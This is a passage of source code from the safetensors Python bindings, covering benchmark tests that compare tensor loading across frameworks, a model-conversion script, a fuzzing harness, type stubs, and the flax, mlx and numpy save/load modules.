tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768)) 28 | tensors["ln_f.weight"] = mx.zeros((768)) 29 | tensors["ln_f.bias"] = mx.zeros((768)) 30 | return tensors 31 | 32 | def load(filename): 33 | return mx.load(filename) 34 | 35 | def test_mlx_mlx_load(benchmark): 36 | # benchmark something 37 | weights = create_gpt2(12) 38 | with tempfile.NamedTemporaryFile(delete=False) as f: 39 | filename = f"{f.name}.npz" 40 | mx.savez(filename, **weights) 41 | result = benchmark(load, filename) 42 | os.unlink(f.name) 43 | 44 | for k, v in weights.items(): 45 | tv = result[k] 46 | assert mx.allclose(v, tv) 47 | 48 | def test_mlx_sf_load(benchmark): 49 | # benchmark something 50 | weights = create_gpt2(12) 51 | with tempfile.NamedTemporaryFile(delete=False) as f: 52 | save_file(weights, f.name) 53 | result = benchmark(load_file, f.name) 54 | os.unlink(f.name) 55 | 56 | for k, v in weights.items(): 57 | tv = result[k] 58 | assert mx.allclose(v, tv) 59 | -------------------------------------------------------------------------------- /bindings/python/benches/test_paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import numpy as np 5 | 6 | import paddle 7 | from safetensors.paddle import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = paddle.zeros((50257, 768)) 13 | tensors["wpe"] = paddle.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,)) 22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,)) 23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,)) 28 | tensors["ln_f.weight"] = paddle.zeros((768,)) 29 | tensors["ln_f.bias"] = paddle.zeros((768,)) 30 | return tensors 31 | 32 | 33 | def test_paddle_paddle_load(benchmark): 34 | # benchmark something 35 | weights = create_gpt2(12) 36 | with tempfile.NamedTemporaryFile(delete=False) as f: 37 | paddle.save(weights, f.name) 38 | result = benchmark(paddle.load, f.name) 39 | os.unlink(f.name) 40 | 41 | for k, v in weights.items(): 42 | tv = result[k] 43 | assert paddle.allclose(v, tv) 44 | 45 | 46 | def test_paddle_sf_load(benchmark): 47 | # benchmark something 48 | weights = create_gpt2(12) 49 | with tempfile.NamedTemporaryFile(delete=False) as f: 50 | save_file(weights, f.name) 51 | result = benchmark(load_file, f.name) 52 | os.unlink(f.name) 53 | 54 | for k, v in weights.items(): 55 | tv = result[k] 56 | assert np.allclose(v, tv) 57 | -------------------------------------------------------------------------------- /bindings/python/benches/test_pt.py: 
-------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import pytest 5 | import torch 6 | 7 | from safetensors.torch import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = torch.zeros((50257, 768)) 13 | tensors["wpe"] = torch.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768)) 28 | tensors["ln_f.weight"] = torch.zeros((768)) 29 | tensors["ln_f.bias"] = torch.zeros((768)) 30 | return tensors 31 | 32 | 33 | def create_lora(n_layers: int): 34 | tensors = {} 35 | for i in range(n_layers): 36 | tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32)) 37 | tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32)) 38 | return tensors 39 | 40 | 41 | def test_pt_pt_load_cpu(benchmark): 42 | # benchmark something 43 | weights = create_gpt2(12) 44 | with tempfile.NamedTemporaryFile(delete=False) as f: 45 | torch.save(weights, f) 46 | result = benchmark(torch.load, f.name) 47 | os.unlink(f.name) 48 | 49 | for k, v in weights.items(): 50 | tv = result[k] 51 | assert torch.allclose(v, tv) 52 | 53 | 54 | def test_pt_sf_load_cpu(benchmark): 55 | # benchmark something 56 | weights = create_gpt2(12) 57 | with tempfile.NamedTemporaryFile(delete=False) as f: 58 | save_file(weights, f.name) 59 | result = benchmark(load_file, f.name) 60 | os.unlink(f.name) 61 | 62 | for k, v in weights.items(): 63 | tv = result[k] 64 | assert torch.allclose(v, tv) 65 | 66 | 67 | def test_pt_pt_load_cpu_small(benchmark): 68 | weights = create_lora(500) 69 | with tempfile.NamedTemporaryFile(delete=False) as f: 70 | torch.save(weights, f) 71 | result = benchmark(torch.load, f.name) 72 | os.unlink(f.name) 73 | 74 | for k, v in weights.items(): 75 | tv = result[k] 76 | assert torch.allclose(v, tv) 77 | 78 | 79 | def test_pt_sf_load_cpu_small(benchmark): 80 | weights = create_lora(500) 81 | with tempfile.NamedTemporaryFile(delete=False) as f: 82 | save_file(weights, f.name) 83 | result = benchmark(load_file, f.name) 84 | os.unlink(f.name) 85 | 86 | for k, v in weights.items(): 87 | tv = result[k] 88 | assert torch.allclose(v, tv) 89 | 90 | 91 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 92 | def test_pt_pt_load_gpu(benchmark): 93 | # benchmark something 94 | weights = create_gpt2(12) 95 | with tempfile.NamedTemporaryFile(delete=False) as f: 96 | torch.save(weights, f) 97 | result = benchmark(torch.load, f.name, map_location="cuda:0") 98 | os.unlink(f.name) 99 | 100 | for k, v in weights.items(): 101 | v = v.cuda() 102 | tv = result[k] 103 | assert torch.allclose(v, tv) 104 | 105 | 106 | @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") 107 | def 
test_pt_sf_load_gpu(benchmark): 108 | # benchmark something 109 | weights = create_gpt2(12) 110 | with tempfile.NamedTemporaryFile(delete=False) as f: 111 | save_file(weights, f.name) 112 | result = benchmark(load_file, f.name, device="cuda:0") 113 | os.unlink(f.name) 114 | 115 | for k, v in weights.items(): 116 | v = v.cuda() 117 | tv = result[k] 118 | assert torch.allclose(v, tv) 119 | 120 | 121 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") 122 | def test_pt_pt_load_mps(benchmark): 123 | # benchmark something 124 | weights = create_gpt2(12) 125 | with tempfile.NamedTemporaryFile(delete=False) as f: 126 | torch.save(weights, f) 127 | result = benchmark(torch.load, f.name, map_location="mps") 128 | os.unlink(f.name) 129 | 130 | for k, v in weights.items(): 131 | v = v.to(device="mps") 132 | tv = result[k] 133 | assert torch.allclose(v, tv) 134 | 135 | 136 | @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") 137 | def test_pt_sf_load_mps(benchmark): 138 | # benchmark something 139 | weights = create_gpt2(12) 140 | with tempfile.NamedTemporaryFile(delete=False) as f: 141 | save_file(weights, f.name) 142 | result = benchmark(load_file, f.name, device="mps") 143 | os.unlink(f.name) 144 | 145 | for k, v in weights.items(): 146 | v = v.to(device="mps") 147 | tv = result[k] 148 | assert torch.allclose(v, tv) 149 | -------------------------------------------------------------------------------- /bindings/python/benches/test_tf.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import h5py 5 | import numpy as np 6 | import tensorflow as tf 7 | 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(filename, tensors=None, prefix=""): 12 | with h5py.File(filename, "r") as f: 13 | if tensors is None: 14 | tensors = {} 15 | for k in f.keys(): 16 | if isinstance(f[k], h5py._hl.dataset.Dataset): 17 | key = k if not prefix else f"{prefix}_{k}" 18 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 19 | else: 20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 21 | return tensors 22 | 23 | 24 | def _save(filename, tensors, prefix=""): 25 | with h5py.File(filename, "w") as f: 26 | for name, tensor in tensors.items(): 27 | tensor = tensor.numpy() 28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 29 | dset[:] = tensor 30 | 31 | 32 | def create_gpt2(n_layers: int): 33 | tensors = {} 34 | tensors["wte"] = tf.zeros((50257, 768)) 35 | tensors["wpe"] = tf.zeros((1024, 768)) 36 | for i in range(n_layers): 37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,)) 38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,)) 39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024)) 40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304)) 41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304)) 42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768)) 43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768)) 44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768)) 45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768)) 46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072)) 47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072)) 48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768)) 49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768)) 50 | tensors["ln_f.weight"] = tf.zeros((768)) 51 | tensors["ln_f.bias"] = 
tf.zeros((768))
52 |     return tensors
53 | 
54 | 
55 | def test_tf_tf_load(benchmark):
56 |     # benchmark something
57 |     weights = create_gpt2(12)
58 |     with tempfile.NamedTemporaryFile(delete=False) as f:
59 |         _save(f.name, weights)
60 |         result = benchmark(_load, f.name)
61 |         os.unlink(f.name)
62 | 
63 |     for k, v in weights.items():
64 |         tv = result[k]
65 |         assert np.allclose(v, tv)
66 | 
67 | 
68 | def test_tf_sf_load(benchmark):
69 |     # benchmark something
70 |     weights = create_gpt2(12)
71 |     with tempfile.NamedTemporaryFile(delete=False) as f:
72 |         save_file(weights, f.name)
73 |         result = benchmark(load_file, f.name)
74 |         os.unlink(f.name)
75 | 
76 |     for k, v in weights.items():
77 |         tv = result[k]
78 |         assert np.allclose(v, tv)
-------------------------------------------------------------------------------- /bindings/python/convert_all.py: --------------------------------------------------------------------------------
1 | """Simple utility tool to automatically convert the most downloaded models"""
2 | from convert import AlreadyExists, convert
3 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
4 | from transformers import AutoConfig
5 | 
6 | 
7 | if __name__ == "__main__":
8 |     api = HfApi()
9 |     args = ModelSearchArguments()
10 | 
11 |     total = 50
12 |     models = list(
13 |         api.list_models(filter=ModelFilter(library=args.library.Transformers), sort="downloads", direction=-1)
14 |     )[:total]
15 | 
16 |     correct = 0
17 |     errors = set()
18 |     for model in models:
19 |         model = api.model_info(model.id, files_metadata=True)
20 |         size = None
21 |         for sibling in model.siblings:
22 |             if sibling.rfilename == "pytorch_model.bin":
23 |                 size = sibling.size
24 |         if size is None or size > 2_000_000_000:
25 |             print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})")
26 |             continue
27 | 
28 |         model_id = model.modelId
29 |         print(f"[{model.downloads}] {model.modelId}")
30 |         try:
31 |             convert(api, model_id)
32 |             correct += 1
33 |         except AlreadyExists as e:
34 |             correct += 1
35 |             print(e)
36 |         except Exception as e:
37 |             config = AutoConfig.from_pretrained(model_id)
38 |             errors.add(config.__class__.__name__)
39 |             print(e)
40 | 
41 |     print(f"Errors: {errors}")
42 |     print(f"Number of distinct failing architectures: {len(errors)}")
43 |     print(f"Correct rate {correct}/{total} ({correct/total * 100:.2f}%)")
-------------------------------------------------------------------------------- /bindings/python/fuzz.py: --------------------------------------------------------------------------------
1 | import datetime
2 | import sys
3 | import tempfile
4 | from collections import defaultdict
5 | 
6 | import atheris
7 | 
8 | 
9 | with atheris.instrument_imports():
10 |     from safetensors.torch import load_file
11 | 
12 | 
13 | EXCEPTIONS = defaultdict(int)
14 | START = datetime.datetime.now()
15 | DT = datetime.timedelta(seconds=30)
16 | 
17 | 
18 | def TestOneInput(data):
19 |     global START
20 |     with tempfile.NamedTemporaryFile() as f:
21 |         f.write(data)
22 |         f.seek(0)
23 |         try:
24 |             load_file(f.name, device=0)
25 |         except Exception as e:
26 |             EXCEPTIONS[str(e)] += 1
27 | 
28 |         if datetime.datetime.now() - START > DT:
29 |             for e, n in EXCEPTIONS.items():
30 |                 print(e, n)
31 |             START = datetime.datetime.now()
32 | 
33 | 
34 | atheris.Setup(sys.argv, TestOneInput)
35 | atheris.Fuzz()
-------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/__init__.py: --------------------------------------------------------------------------------
1 | # Re-export this
2 | from ._safetensors_rust import (  # noqa: F401
3 |     SafetensorError,
4 |     __version__,
5 |     deserialize,
6 |     safe_open,
7 |     serialize,
8 |     serialize_file,
9 | )
14 | 
15 | # Re-export this
16 | from ._safetensors_rust import (  # noqa: F401
17 |     SafetensorError,
18 |     __version__,
19 |     deserialize,
20 |     safe_open,
21 |     serialize,
22 |     serialize_file,
23 | )
24 | 
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/__init__.pyi:
--------------------------------------------------------------------------------
1 | # Generated content DO NOT EDIT
2 | @staticmethod
3 | def deserialize(bytes):
4 |     """
5 |     Deserializes the byte content of a safetensors file and returns the tensors it contains
6 | 
7 |     Args:
8 |         data (`bytes`):
9 |             The byte content of a file
10 | 
11 |     Returns:
12 |         (`List[Tuple[str, Dict[str, Any]]]`):
13 |             The deserialized content is like:
14 |                 [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)]
15 |     """
16 |     pass
17 | 
18 | @staticmethod
19 | def serialize(tensor_dict, metadata=None):
20 |     """
21 |     Serializes raw data.
22 | 
23 |     Args:
24 |         tensor_dict (`Dict[str, Dict[str, Any]]`):
25 |             The tensor dict is like:
26 |                 {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}}
27 |         metadata (`Dict[str, str]`, *optional*):
28 |             The optional purely text annotations
29 | 
30 |     Returns:
31 |         (`bytes`):
32 |             The serialized content.
33 |     """
34 |     pass
35 | 
36 | @staticmethod
37 | def serialize_file(tensor_dict, filename, metadata=None):
38 |     """
39 |     Serializes raw data into a file.
40 | 
41 |     Args:
42 |         tensor_dict (`Dict[str, Dict[str, Any]]`):
43 |             The tensor dict is like:
44 |                 {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}}
45 |         filename (`str`, or `os.PathLike`):
46 |             The name of the file to write into.
47 |         metadata (`Dict[str, str]`, *optional*):
48 |             The optional purely text annotations
49 | 
50 |     Returns:
51 |         (`NoneType`):
52 |             On success return None.
53 |     """
54 |     pass
55 | 
56 | class safe_open:
57 |     """
58 |     Opens a safetensors file lazily and returns tensors as requested
59 | 
60 |     Args:
61 |         filename (`str`, or `os.PathLike`):
62 |             The filename to open
63 | 
64 |         framework (`str`):
65 |             The framework you want your tensors in. Supported values:
66 |             `pt`, `tf`, `flax`, `numpy`.
67 | 
68 |         device (`str`, defaults to `"cpu"`):
69 |             The device on which you want the tensors.
70 |     """
71 | 
72 |     def __init__(self, filename, framework, device=...):
73 |         pass
74 |     def __enter__(self):
75 |         """
76 |         Starts the context manager
77 |         """
78 |         pass
79 |     def __exit__(self, _exc_type, _exc_value, _traceback):
80 |         """
81 |         Exits the context manager
82 |         """
83 |         pass
84 |     def get_slice(self, name):
85 |         """
86 |         Returns a full slice view object
87 | 
88 |         Args:
89 |             name (`str`):
90 |                 The name of the tensor you want
91 | 
92 |         Returns:
93 |             (`PySafeSlice`):
94 |                 A lazy slice object you can index into to get a real tensor
95 |         Example:
96 |         ```python
97 |         from safetensors import safe_open
98 | 
99 |         with safe_open("model.safetensors", framework="pt", device=0) as f:
100 |             tensor_part = f.get_slice("embedding")[:, ::8]
101 | 
102 |         ```
103 |         """
104 |         pass
105 |     def get_tensor(self, name):
106 |         """
107 |         Returns a full tensor
108 | 
109 |         Args:
110 |             name (`str`):
111 |                 The name of the tensor you want
112 | 
113 |         Returns:
114 |             (`Tensor`):
115 |                 The tensor in the framework you opened the file for.
116 | 
117 |         Example:
118 |         ```python
119 |         from safetensors import safe_open
120 | 
121 |         with safe_open("model.safetensors", framework="pt", device=0) as f:
122 |             tensor = f.get_tensor("embedding")
123 | 
124 |         ```
125 |         """
126 |         pass
127 |     def keys(self):
128 |         """
129 |         Returns the names of the tensors in the file.
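130 | 
131 |         Example (illustrative; assumes a local `model.safetensors` file):
132 |         ```python
133 |         from safetensors import safe_open
134 | 
135 |         with safe_open("model.safetensors", framework="pt") as f:
136 |             print(f.keys())
137 |         ```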
138 | 
139 |         Returns:
140 |             (`List[str]`):
141 |                 The names of the tensors contained in that file
142 |         """
143 |         pass
144 |     def metadata(self):
145 |         """
146 |         Returns the special non-tensor information stored in the header
147 | 
148 |         Returns:
149 |             (`Dict[str, str]`):
150 |                 The freeform metadata.
151 |         """
152 |         pass
153 | 
154 | class SafetensorError(Exception):
155 |     """
156 |     Custom Python Exception for Safetensor errors.
157 |     """
158 | 
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/flax.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Dict, Optional, Union
3 | 
4 | import numpy as np
5 | 
6 | import jax.numpy as jnp
7 | from jax import Array
8 | from safetensors import numpy, safe_open
9 | 
10 | 
11 | def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes:
12 |     """
13 |     Saves a dictionary of tensors into raw bytes in safetensors format.
14 | 
15 |     Args:
16 |         tensors (`Dict[str, Array]`):
17 |             The incoming tensors. Tensors need to be contiguous and dense.
18 |         metadata (`Dict[str, str]`, *optional*, defaults to `None`):
19 |             Optional text only metadata you might want to save in your header.
20 |             For instance it can be useful to specify more about the underlying
21 |             tensors. This is purely informative and does not affect tensor loading.
22 | 
23 |     Returns:
24 |         `bytes`: The raw bytes representing the format
25 | 
26 |     Example:
27 | 
28 |     ```python
29 |     from safetensors.flax import save
30 |     from jax import numpy as jnp
31 | 
32 |     tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
33 |     byte_data = save(tensors)
34 |     ```
35 |     """
36 |     np_tensors = _jnp2np(tensors)
37 |     return numpy.save(np_tensors, metadata=metadata)
38 | 
39 | 
40 | def save_file(
41 |     tensors: Dict[str, Array],
42 |     filename: Union[str, os.PathLike],
43 |     metadata: Optional[Dict[str, str]] = None,
44 | ) -> None:
45 |     """
46 |     Saves a dictionary of tensors into raw bytes in safetensors format.
47 | 
48 |     Args:
49 |         tensors (`Dict[str, Array]`):
50 |             The incoming tensors. Tensors need to be contiguous and dense.
51 |         filename (`str`, or `os.PathLike`)):
52 |             The filename we're saving into.
53 |         metadata (`Dict[str, str]`, *optional*, defaults to `None`):
54 |             Optional text only metadata you might want to save in your header.
55 |             For instance it can be useful to specify more about the underlying
56 |             tensors. This is purely informative and does not affect tensor loading.
57 | 
58 |     Returns:
59 |         `None`
60 | 
61 |     Example:
62 | 
63 |     ```python
64 |     from safetensors.flax import save_file
65 |     from jax import numpy as jnp
66 | 
67 |     tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))}
68 |     save_file(tensors, "model.safetensors")
69 |     ```
70 |     """
71 |     np_tensors = _jnp2np(tensors)
72 |     return numpy.save_file(np_tensors, filename, metadata=metadata)
73 | 
74 | 
75 | def load(data: bytes) -> Dict[str, Array]:
76 |     """
77 |     Loads a safetensors file into flax format from pure bytes.
78 | 79 | Args: 80 | data (`bytes`): 81 | The content of a safetensors file 82 | 83 | Returns: 84 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` on cpu 85 | 86 | Example: 87 | 88 | ```python 89 | from safetensors.flax import load 90 | 91 | file_path = "./my_folder/bert.safetensors" 92 | with open(file_path, "rb") as f: 93 | data = f.read() 94 | 95 | loaded = load(data) 96 | ``` 97 | """ 98 | flat = numpy.load(data) 99 | return _np2jnp(flat) 100 | 101 | 102 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]: 103 | """ 104 | Loads a safetensors file into flax format. 105 | 106 | Args: 107 | filename (`str`, or `os.PathLike`)): 108 | The name of the file which contains the tensors 109 | 110 | Returns: 111 | `Dict[str, Array]`: dictionary that contains name as key, value as `Array` 112 | 113 | Example: 114 | 115 | ```python 116 | from safetensors.flax import load_file 117 | 118 | file_path = "./my_folder/bert.safetensors" 119 | loaded = load_file(file_path) 120 | ``` 121 | """ 122 | result = {} 123 | with safe_open(filename, framework="flax") as f: 124 | for k in f.offset_keys(): 125 | result[k] = f.get_tensor(k) 126 | return result 127 | 128 | 129 | def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]: 130 | for k, v in numpy_dict.items(): 131 | numpy_dict[k] = jnp.array(v) 132 | return numpy_dict 133 | 134 | 135 | def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]: 136 | for k, v in jnp_dict.items(): 137 | jnp_dict[k] = np.asarray(v) 138 | return jnp_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | 6 | import mlx.core as mx 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]] = None) -> bytes: 11 | """ 12 | Saves a dictionary of tensors into raw bytes in safetensors format. 13 | 14 | Args: 15 | tensors (`Dict[str, mx.array]`): 16 | The incoming tensors. Tensors need to be contiguous and dense. 17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 18 | Optional text only metadata you might want to save in your header. 19 | For instance it can be useful to specify more about the underlying 20 | tensors. This is purely informative and does not affect tensor loading. 21 | 22 | Returns: 23 | `bytes`: The raw bytes representing the format 24 | 25 | Example: 26 | 27 | ```python 28 | from safetensors.mlx import save 29 | import mlx.core as mx 30 | 31 | tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))} 32 | byte_data = save(tensors) 33 | ``` 34 | """ 35 | np_tensors = _mx2np(tensors) 36 | return numpy.save(np_tensors, metadata=metadata) 37 | 38 | 39 | def save_file( 40 | tensors: Dict[str, mx.array], 41 | filename: Union[str, os.PathLike], 42 | metadata: Optional[Dict[str, str]] = None, 43 | ) -> None: 44 | """ 45 | Saves a dictionary of tensors into raw bytes in safetensors format. 46 | 47 | Args: 48 | tensors (`Dict[str, mx.array]`): 49 | The incoming tensors. Tensors need to be contiguous and dense. 50 | filename (`str`, or `os.PathLike`)): 51 | The filename we're saving into. 52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 53 | Optional text only metadata you might want to save in your header. 
54 |             For instance it can be useful to specify more about the underlying
55 |             tensors. This is purely informative and does not affect tensor loading.
56 | 
57 |     Returns:
58 |         `None`
59 | 
60 |     Example:
61 | 
62 |     ```python
63 |     from safetensors.mlx import save_file
64 |     import mlx.core as mx
65 | 
66 |     tensors = {"embedding": mx.zeros((512, 1024)), "attention": mx.zeros((256, 256))}
67 |     save_file(tensors, "model.safetensors")
68 |     ```
69 |     """
70 |     np_tensors = _mx2np(tensors)
71 |     return numpy.save_file(np_tensors, filename, metadata=metadata)
72 | 
73 | 
74 | def load(data: bytes) -> Dict[str, mx.array]:
75 |     """
76 |     Loads a safetensors file into MLX format from pure bytes.
77 | 
78 |     Args:
79 |         data (`bytes`):
80 |             The content of a safetensors file
81 | 
82 |     Returns:
83 |         `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
84 | 
85 |     Example:
86 | 
87 |     ```python
88 |     from safetensors.mlx import load
89 | 
90 |     file_path = "./my_folder/bert.safetensors"
91 |     with open(file_path, "rb") as f:
92 |         data = f.read()
93 | 
94 |     loaded = load(data)
95 |     ```
96 |     """
97 |     flat = numpy.load(data)
98 |     return _np2mx(flat)
99 | 
100 | 
101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
102 |     """
103 |     Loads a safetensors file into MLX format.
104 | 
105 |     Args:
106 |         filename (`str`, or `os.PathLike`)):
107 |             The name of the file which contains the tensors
108 | 
109 |     Returns:
110 |         `Dict[str, mx.array]`: dictionary that contains name as key, value as `mx.array`
111 | 
112 |     Example:
113 | 
114 |     ```python
115 |     from safetensors.mlx import load_file
116 | 
117 |     file_path = "./my_folder/bert.safetensors"
118 |     loaded = load_file(file_path)
119 |     ```
120 |     """
121 |     result = {}
122 |     with safe_open(filename, framework="mlx") as f:
123 |         for k in f.offset_keys():
124 |             result[k] = f.get_tensor(k)
125 |     return result
126 | 
127 | 
128 | def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
129 |     for k, v in numpy_dict.items():
130 |         numpy_dict[k] = mx.array(v)
131 |     return numpy_dict
132 | 
133 | 
134 | def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]:
135 |     new_dict = {}
136 |     for k, v in mx_dict.items():
137 |         new_dict[k] = np.asarray(v)
138 |     return new_dict
139 | 
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/numpy.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Dict, Optional, Union
4 | 
5 | import numpy as np
6 | 
7 | from safetensors import deserialize, safe_open, serialize, serialize_file
8 | 
9 | 
10 | def _tobytes(tensor: np.ndarray) -> bytes:
11 |     if not _is_little_endian(tensor):
12 |         tensor = tensor.byteswap(inplace=False)
13 |     return tensor.tobytes()
14 | 
15 | 
16 | def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]] = None) -> bytes:
17 |     """
18 |     Saves a dictionary of tensors into raw bytes in safetensors format.
19 | 
20 |     Args:
21 |         tensor_dict (`Dict[str, np.ndarray]`):
22 |             The incoming tensors. Tensors need to be contiguous and dense.
23 |         metadata (`Dict[str, str]`, *optional*, defaults to `None`):
24 |             Optional text only metadata you might want to save in your header.
25 |             For instance it can be useful to specify more about the underlying
26 |             tensors. This is purely informative and does not affect tensor loading. 
27 | 28 | Returns: 29 | `bytes`: The raw bytes representing the format 30 | 31 | Example: 32 | 33 | ```python 34 | from safetensors.numpy import save 35 | import numpy as np 36 | 37 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 38 | byte_data = save(tensors) 39 | ``` 40 | """ 41 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} 42 | serialized = serialize(flattened, metadata=metadata) 43 | result = bytes(serialized) 44 | return result 45 | 46 | 47 | def save_file( 48 | tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]] = None 49 | ) -> None: 50 | """ 51 | Saves a dictionary of tensors into raw bytes in safetensors format. 52 | 53 | Args: 54 | tensor_dict (`Dict[str, np.ndarray]`): 55 | The incoming tensors. Tensors need to be contiguous and dense. 56 | filename (`str`, or `os.PathLike`)): 57 | The filename we're saving into. 58 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 59 | Optional text only metadata you might want to save in your header. 60 | For instance it can be useful to specify more about the underlying 61 | tensors. This is purely informative and does not affect tensor loading. 62 | 63 | Returns: 64 | `None` 65 | 66 | Example: 67 | 68 | ```python 69 | from safetensors.numpy import save_file 70 | import numpy as np 71 | 72 | tensors = {"embedding": np.zeros((512, 1024)), "attention": np.zeros((256, 256))} 73 | save_file(tensors, "model.safetensors") 74 | ``` 75 | """ 76 | flattened = {k: {"dtype": v.dtype.name, "shape": v.shape, "data": _tobytes(v)} for k, v in tensor_dict.items()} 77 | serialize_file(flattened, filename, metadata=metadata) 78 | 79 | 80 | def load(data: bytes) -> Dict[str, np.ndarray]: 81 | """ 82 | Loads a safetensors file into numpy format from pure bytes. 83 | 84 | Args: 85 | data (`bytes`): 86 | The 